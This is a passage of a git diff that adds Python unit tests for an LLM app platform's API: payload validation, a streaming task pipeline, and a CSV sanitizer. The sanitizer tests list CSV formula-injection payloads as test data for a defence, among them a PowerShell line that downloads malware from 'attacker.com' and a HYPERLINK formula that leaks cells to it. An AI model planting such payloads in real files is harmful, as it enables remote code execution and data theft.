+ assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if 
not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 diff --git a/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py b/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py new file mode 100644 index 0000000000..1fb7e7009d --- /dev/null +++ b/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py @@ 
-0,0 +1,25 @@ +import uuid + +import pytest +from pydantic import ValidationError + +from controllers.service_api.app.completion import ChatRequestPayload + + +def test_chat_request_payload_accepts_blank_conversation_id(): + payload = ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": ""}) + + assert payload.conversation_id is None + + +def test_chat_request_payload_validates_uuid(): + conversation_id = str(uuid.uuid4()) + + payload = ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": conversation_id}) + + assert payload.conversation_id == conversation_id + + +def test_chat_request_payload_rejects_invalid_uuid(): + with pytest.raises(ValidationError): + ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": "invalid"}) diff --git a/api/tests/unit_tests/controllers/test_conversation_rename_payload.py b/api/tests/unit_tests/controllers/test_conversation_rename_payload.py new file mode 100644 index 0000000000..494176cbd9 --- /dev/null +++ b/api/tests/unit_tests/controllers/test_conversation_rename_payload.py @@ -0,0 +1,20 @@ +import pytest +from pydantic import ValidationError + +from controllers.console.explore.conversation import ConversationRenamePayload as ConsolePayload +from controllers.service_api.app.conversation import ConversationRenamePayload as ServicePayload + + +@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload]) +def test_payload_allows_auto_generate_without_name(payload_cls): + payload = payload_cls.model_validate({"auto_generate": True}) + + assert payload.auto_generate is True + assert payload.name is None + + +@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload]) +@pytest.mark.parametrize("value", [None, "", " "]) +def test_payload_requires_name_when_not_auto_generate(payload_cls, value): + with pytest.raises(ValidationError): + payload_cls.model_validate({"name": value, "auto_generate": False}) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py new file mode 100644 index 0000000000..40f58c9ddf --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py @@ -0,0 +1,420 @@ +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest + +from core.app.apps.base_app_queue_manager import AppQueueManager +from core.app.entities.app_invoke_entities import ChatAppGenerateEntity +from core.app.entities.queue_entities import ( + QueueAgentMessageEvent, + QueueErrorEvent, + QueueLLMChunkEvent, + QueueMessageEndEvent, + QueueMessageFileEvent, + QueuePingEvent, +) +from core.app.entities.task_entities import ( + EasyUITaskState, + ErrorStreamResponse, + MessageEndStreamResponse, + MessageFileStreamResponse, + MessageReplaceStreamResponse, + MessageStreamResponse, + PingStreamResponse, + StreamEvent, +) +from core.app.task_pipeline.easy_ui_based_generate_task_pipeline import EasyUIBasedGenerateTaskPipeline +from core.base.tts import AppGeneratorTTSPublisher +from core.model_runtime.entities.llm_entities import LLMResult as RuntimeLLMResult +from core.model_runtime.entities.message_entities import TextPromptMessageContent +from core.ops.ops_trace_manager import TraceQueueManager +from models.model import AppMode + + +class TestEasyUIBasedGenerateTaskPipelineProcessStreamResponse: + """Test cases for 
EasyUIBasedGenerateTaskPipeline._process_stream_response method.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock(spec=ChatAppGenerateEntity) + entity.task_id = "test-task-id" + entity.app_id = "test-app-id" + # minimal app_config used by pipeline internals + entity.app_config = SimpleNamespace( + tenant_id="test-tenant-id", + app_id="test-app-id", + app_mode=AppMode.CHAT, + app_model_config_dict={}, + additional_features=None, + sensitive_word_avoidance=None, + ) + # minimal model_conf for LLMResult init + entity.model_conf = SimpleNamespace( + model="test-model", + provider_model_bundle=SimpleNamespace(model_type_instance=Mock()), + credentials={}, + ) + return entity + + @pytest.fixture + def mock_queue_manager(self): + """Create a mock queue manager.""" + manager = Mock(spec=AppQueueManager) + return manager + + @pytest.fixture + def mock_message_cycle_manager(self): + """Create a mock message cycle manager.""" + manager = Mock() + manager.get_message_event_type.return_value = StreamEvent.MESSAGE + manager.message_to_stream_response.return_value = Mock(spec=MessageStreamResponse) + manager.message_file_to_stream_response.return_value = Mock(spec=MessageFileStreamResponse) + manager.message_replace_to_stream_response.return_value = Mock(spec=MessageReplaceStreamResponse) + manager.handle_retriever_resources = Mock() + manager.handle_annotation_reply.return_value = None + return manager + + @pytest.fixture + def mock_conversation(self): + """Create a mock conversation.""" + conversation = Mock() + conversation.id = "test-conversation-id" + conversation.mode = "chat" + return conversation + + @pytest.fixture + def mock_message(self): + """Create a mock message.""" + message = Mock() + message.id = "test-message-id" + message.created_at = Mock() + message.created_at.timestamp.return_value = 1234567890 + return message + + @pytest.fixture + def mock_task_state(self): + """Create a mock task state.""" + task_state = Mock(spec=EasyUITaskState) + + # Create LLM result mock + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.prompt_messages = [] + llm_result.message = Mock() + llm_result.message.content = "" + + task_state.llm_result = llm_result + task_state.answer = "" + + return task_state + + @pytest.fixture + def pipeline( + self, + mock_application_generate_entity, + mock_queue_manager, + mock_conversation, + mock_message, + mock_message_cycle_manager, + mock_task_state, + ): + """Create an EasyUIBasedGenerateTaskPipeline instance with mocked dependencies.""" + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.EasyUITaskState", return_value=mock_task_state + ): + pipeline = EasyUIBasedGenerateTaskPipeline( + application_generate_entity=mock_application_generate_entity, + queue_manager=mock_queue_manager, + conversation=mock_conversation, + message=mock_message, + stream=True, + ) + pipeline._message_cycle_manager = mock_message_cycle_manager + pipeline._task_state = mock_task_state + return pipeline + + def test_get_message_event_type_called_once_when_first_llm_chunk_arrives( + self, pipeline, mock_message_cycle_manager + ): + """Expect get_message_event_type to be called when processing the first LLM chunk event.""" + # Setup a minimal LLM chunk event + chunk = Mock() + chunk.delta.message.content = "hi" + chunk.prompt_messages = [] + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + mock_queue_message = Mock() + mock_queue_message.event = 
llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + mock_message_cycle_manager.get_message_event_type.assert_called_once_with(message_id="test-message-id") + + def test_llm_chunk_event_with_text_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with text content.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Hello, world!" + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello, world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello, world!" + + def test_llm_chunk_event_with_list_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with list content.""" + # Setup + text_content = Mock(spec=TextPromptMessageContent) + text_content.data = "Hello" + + chunk = Mock() + chunk.delta.message.content = [text_content, " world!"] + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello world!" 
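+        # The list-content case above relies on the pipeline flattening mixed
+        # content: ``TextPromptMessageContent`` items contribute their ``.data``
+        # while plain strings are concatenated as-is, yielding "Hello world!".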
+ + def test_agent_message_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of agent message events.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Agent response" + + agent_message_event = Mock(spec=QueueAgentMessageEvent) + agent_message_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = agent_message_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Ensure method under assertion is a mock to track calls + pipeline._agent_message_to_stream_response = Mock(return_value=Mock()) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + # Agent messages should use _agent_message_to_stream_response + pipeline._agent_message_to_stream_response.assert_called_once_with( + answer="Agent response", message_id="test-message-id" + ) + + def test_message_end_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of message end events.""" + # Setup + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.message = Mock() + llm_result.message.content = "Final response" + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = llm_result + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert mock_task_state.llm_result == llm_result + pipeline._save_message.assert_called_once() + pipeline._message_end_to_stream_response.assert_called_once() + + def test_error_event(self, pipeline): + """Test handling of error events.""" + # Setup + error_event = Mock(spec=QueueErrorEvent) + error_event.error = Exception("Test error") + + mock_queue_message = Mock() + mock_queue_message.event = error_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.handle_error = Mock(return_value=Exception("Test error")) + pipeline.error_to_stream_response = Mock(return_value=Mock(spec=ErrorStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.handle_error.assert_called_once() + pipeline.error_to_stream_response.assert_called_once() + + def test_ping_event(self, pipeline): + """Test handling of ping events.""" + # Setup + ping_event = Mock(spec=QueuePingEvent) + + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.ping_stream_response.assert_called_once() + + def 
test_file_event(self, pipeline, mock_message_cycle_manager): + """Test handling of file events.""" + # Setup + file_event = Mock(spec=QueueMessageFileEvent) + file_event.message_file_id = "file-id" + + mock_queue_message = Mock() + mock_queue_message.event = file_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + file_response = Mock(spec=MessageFileStreamResponse) + mock_message_cycle_manager.message_file_to_stream_response.return_value = file_response + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert responses[0] == file_response + mock_message_cycle_manager.message_file_to_stream_response.assert_called_once_with(file_event) + + def test_publisher_is_called_with_messages(self, pipeline): + """Test that publisher publishes messages when provided.""" + # Setup + publisher = Mock(spec=AppGeneratorTTSPublisher) + + ping_event = Mock(spec=QueuePingEvent) + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + list(pipeline._process_stream_response(publisher=publisher, trace_manager=None)) + + # Assert + # Called once with message and once with None at the end + assert publisher.publish.call_count == 2 + publisher.publish.assert_any_call(mock_queue_message) + publisher.publish.assert_any_call(None) + + def test_trace_manager_passed_to_save_message(self, pipeline): + """Test that trace manager is passed to _save_message.""" + # Setup + trace_manager = Mock(spec=TraceQueueManager) + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = None + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=trace_manager)) + + # Assert + pipeline._save_message.assert_called_once_with(session=ANY, trace_manager=trace_manager) + + def test_multiple_events_sequence(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling multiple events in sequence.""" + # Setup + chunk1 = Mock() + chunk1.delta.message.content = "Hello" + chunk1.prompt_messages = [] + + chunk2 = Mock() + chunk2.delta.message.content = " world!" 
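+        # prompt_messages is set on every chunk (empty here) to mirror the
+        # payload shape the pipeline expects; the earlier single-chunk tests
+        # follow the same pattern.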
+ chunk2.prompt_messages = [] + + llm_chunk_event1 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event1.chunk = chunk1 + + ping_event = Mock(spec=QueuePingEvent) + + llm_chunk_event2 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event2.chunk = chunk2 + + mock_queue_messages = [ + Mock(event=llm_chunk_event1), + Mock(event=ping_event), + Mock(event=llm_chunk_event2), + ] + pipeline.queue_manager.listen.return_value = mock_queue_messages + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 3 + assert mock_task_state.llm_result.message.content == "Hello world!" + + # Verify calls to message_to_stream_response + assert mock_message_cycle_manager.message_to_stream_response.call_count == 2 + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer="Hello", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer=" world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py new file mode 100644 index 0000000000..5ef7f0d7f4 --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py @@ -0,0 +1,166 @@ +"""Unit tests for the message cycle manager optimization.""" + +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest +from flask import current_app + +from core.app.entities.task_entities import MessageStreamResponse, StreamEvent +from core.app.task_pipeline.message_cycle_manager import MessageCycleManager + + +class TestMessageCycleManagerOptimization: + """Test cases for the message cycle manager optimization that prevents N+1 queries.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock() + entity.task_id = "test-task-id" + return entity + + @pytest.fixture + def message_cycle_manager(self, mock_application_generate_entity): + """Create a message cycle manager instance.""" + task_state = Mock() + return MessageCycleManager(application_generate_entity=mock_application_generate_entity, task_state=task_state) + + def test_get_message_event_type_with_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE_FILE when message has files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_get_message_event_type_without_message_file(self, 
message_cycle_manager): + """Test get_message_event_type returns MESSAGE when message has no files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and no message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_precomputed_event_type(self, message_cycle_manager): + """MessageCycleManager.message_to_stream_response expects a valid event_type; callers should precompute it.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute: compute event type once, then pass to message_to_stream_response + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=event_type + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_event_type_skips_query(self, message_cycle_manager): + """Test that message_to_stream_response skips database query when event_type is provided.""" + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + # Execute with event_type provided + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE + # Should not query database when event_type is provided + mock_session_class.assert_not_called() + + def test_message_to_stream_response_with_from_variable_selector(self, message_cycle_manager): + """Test message_to_stream_response with from_variable_selector parameter.""" + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", + message_id="test-message-id", + from_variable_selector=["var1", "var2"], + event_type=StreamEvent.MESSAGE, + ) + + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.from_variable_selector == ["var1", "var2"] + assert result.event == StreamEvent.MESSAGE + + def test_optimization_usage_example(self, message_cycle_manager): + """Test the 
optimization pattern that should be used by callers.""" + # Step 1: Get event type once (this queries database) + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None # No files + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + + # Should query database once + mock_session_class.assert_called_once_with(ANY, expire_on_commit=False) + assert event_type == StreamEvent.MESSAGE + + # Step 2: Use event_type for multiple calls (no additional queries) + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + mock_session_class.return_value.__enter__.return_value = Mock() + + chunk1_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 1", message_id="test-message-id", event_type=event_type + ) + + chunk2_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 2", message_id="test-message-id", event_type=event_type + ) + + # Should not query database again + mock_session_class.assert_not_called() + + assert chunk1_response.event == StreamEvent.MESSAGE + assert chunk2_response.event == StreamEvent.MESSAGE + assert chunk1_response.answer == "Chunk 1" + assert chunk2_response.answer == "Chunk 2" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert 
CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack 
payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py b/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py index d9f6dcc43c..025a0d8d70 100644 --- a/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py +++ 